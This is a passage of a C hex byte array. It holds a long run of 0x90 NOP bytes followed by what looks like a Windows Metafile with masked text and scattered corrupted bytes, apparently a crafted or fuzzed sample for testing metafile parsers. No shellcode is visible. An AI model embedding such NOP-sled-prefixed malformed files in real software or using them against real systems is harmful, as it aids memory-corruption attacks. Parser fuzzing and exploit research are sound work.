	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
	0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x00,
	0x09, 0x00, 0x04, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xA5, 0x01,
	0x2A, 0x00, 0x09, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
	0x0A, 0xFB, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x09, 0x00, 0x07, 0x00, 0x09, 0x00,
	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x8A,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x70, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x19, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0x2A, 0x00,
	0x0C, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0C, 0x00,
	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0xBB, 0x01, 0xA3, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x01, 0x00, 0x25, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xBB, 0x01, 0xA9, 0x00, 0x14, 0x00, 0x00, 0x00,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x20, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00,
	0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0xBE, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x3D, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xD1, 0x01, 0x2A, 0x00, 0x24, 0x00, 0x00, 0x00, 0x49, 0x20,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x42, 0x20, 0x3D, 0x20, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20,
	0x42, 0x20, 0x07, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x09, 0x00,
	0x05, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
	0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00,
	0x06, 0x00, 0x04, 0x00, 0x0E, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00,
	0x0A, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x2A, 0x00, 0x01, 0x00, 0x00, 0x00, 0x49, 0x00, 0x07, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x9F,
	0x0A, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0xE8, 0x01, 0x31, 0x00, 0x01, 0x00,
	0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0xB0, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02,
	0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x30, 0x00, 0x00, 0x00, 0x32, 0x0A,
	0xE8, 0x01, 0x37, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x20, 0x00, 0x0C, 0x00, 0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00,
	0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00,
	0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x04, 0x00, 0x0C, 0x00,
	0x0C, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x32, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x24, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0x2A, 0x00, 0x13, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x00,
	0x07, 0x22, 0x0D, 0x00, 0x0C, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
	0x0A, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x05, 0xE9,
	0x0A, 0x00, 0x06, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x7E, 0x01, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00, 0x00, 0x00, 0xFB, 0x02, 0xE5, 0xFF, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69,
	0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11,
	0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x03, 0x00, 0x04, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x05, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x15, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x06, 0x02, 0xBE, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00, 0x0D, 0x00, 0x0F, 0x00,
	0x0E, 0x00, 0x0E, 0x00, 0x09, 0x00, 0x0D, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x15, 0x00,
	0x00, 0x00, 0xFB, 0x02, 0xED, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xBC, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20,
	0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x00, 0x00, 0x11, 0x04, 0x00, 0x00, 0x00, 0x2D, 0x01, 0x05, 0x00,
	0x08, 0x00, 0x00, 0x00, 0xF0, 0x01, 0x03, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x13, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x06, 0x02, 0x2D, 0x01, 0x08, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x20, 0x0A, 0x00, 0x08, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00,
	0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0x2A, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x20, 0x3D, 0x00, 0x07, 0x00, 0x0E, 0x00, 0x0D, 0x00,
	0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x83,
	0x59, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0xC3, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x57, 0x01, 0x00, 0x18, 0x00, 0x00, 0xF2, 0x32, 0x0A, 0x1E, 0x02,
	0x60, 0x00, 0x0B, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x06, 0x00, 0x09, 0x00, 0x08, 0x00, 0x05, 0x00, 0x09, 0x00,
	0x0A, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x1E, 0x02, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x06, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00,
	0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00,
	0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x01, 0x00, 0x10, 0x00, 0x00, 0x00, 0xCD, 0x0A, 0x1E, 0x02, 0xBE, 0x00, 0x06, 0x00, 0x00, 0x00,
	0x31, 0x20, 0x77, 0x77, 0x77, 0x77, 0x09, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x09, 0x00, 0x06, 0x00,
	0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01,
	0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00,
	0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x1E, 0x02, 0xEF, 0x00,
	0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF,
	0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x22, 0x00, 0x00, 0x00,
	0x32, 0x0A, 0x1E, 0x02, 0xF4, 0x00, 0x12, 0x00, 0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x20, 0x08, 0x00, 0x0A, 0x00,
	0x0A, 0x00, 0x09, 0x00, 0x09, 0x00, 0x08, 0x00, 0x06, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x0A, 0x00,
	0x05, 0x00, 0x09, 0x00, 0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0F, 0x00, 0x09, 0x00, 0x05, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x1B, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x2A, 0x00, 0x0D, 0x00,
	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x00,
	0x07, 0x00, 0x0F, 0x00, 0x0C, 0x00, 0x04, 0x00, 0x0B, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00,
	0x08, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0A, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x87, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x95, 0x00, 0x01, 0x00, 0x00, 0xE0, 0x2D, 0x00, 0x06, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x9F, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00,
	0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02,
	0x00, 0x00, 0x00, 0x00, 0x04, 0xC6, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x01, 0x00, 0x24, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x34, 0x02, 0x9B, 0x00, 0x13, 0x00,
	0x00, 0x00, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77, 0x77,
	0x77, 0x77, 0x77, 0x77, 0x20, 0x00, 0x05, 0x00, 0x05, 0x00, 0x0B, 0x00, 0x09, 0x00, 0x04, 0x00,
	0x0A, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0E, 0x00, 0x06, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x06, 0x00,
	0x09, 0x00, 0x09, 0x00, 0x06, 0x00, 0xB8, 0x00, 0x08, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
	0x12, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x2A, 0x00, 0x07, 0x00, 0x00, 0x00, 0x4A, 0x4E,
	0x4B, 0x20, 0x3D, 0x20, 0x63, 0x00, 0x0A, 0x00, 0x0E, 0x00, 0x0E, 0x00, 0x05, 0x00, 0x0A, 0x00,
	0x05, 0x00, 0x09, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00,
	0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x09, 0x00, 0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02,
	0x6D, 0x00, 0x01, 0x00, 0x00, 0x00, 0x2D, 0x00, 0x05, 0x00, 0x04, 0x00, 0x00, 0x00, 0x2E, 0x01,
	0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00, 0x09, 0x02,
	0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00,
	0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00, 0x0F, 0x00,
	0x00, 0x00, 0x32, 0x0A, 0x4B, 0x02, 0x72, 0x00, 0x05, 0x00, 0x00, 0x00, 0x4A, 0x75, 0x6E, 0x20,
	0x4E, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x0A, 0x00, 0x05, 0x00, 0x0E, 0x00, 0x04, 0x00, 0x00, 0x00,
	0x2E, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x02, 0x00, 0x05, 0x00, 0x00, 0x00,
	0x09, 0x02, 0xFF, 0xFF, 0xFF, 0x02, 0x05, 0x00, 0x00, 0x00, 0x14, 0x95, 0x00, 0x00, 0x00, 0x00,
	0x04, 0x00, 0x00, 0x00, 0x2E, 0x01, 0x18, 0x00, 0x04, 0x00, 0x00, 0x00, 0x02, 0x01, 0x01, 0x00,
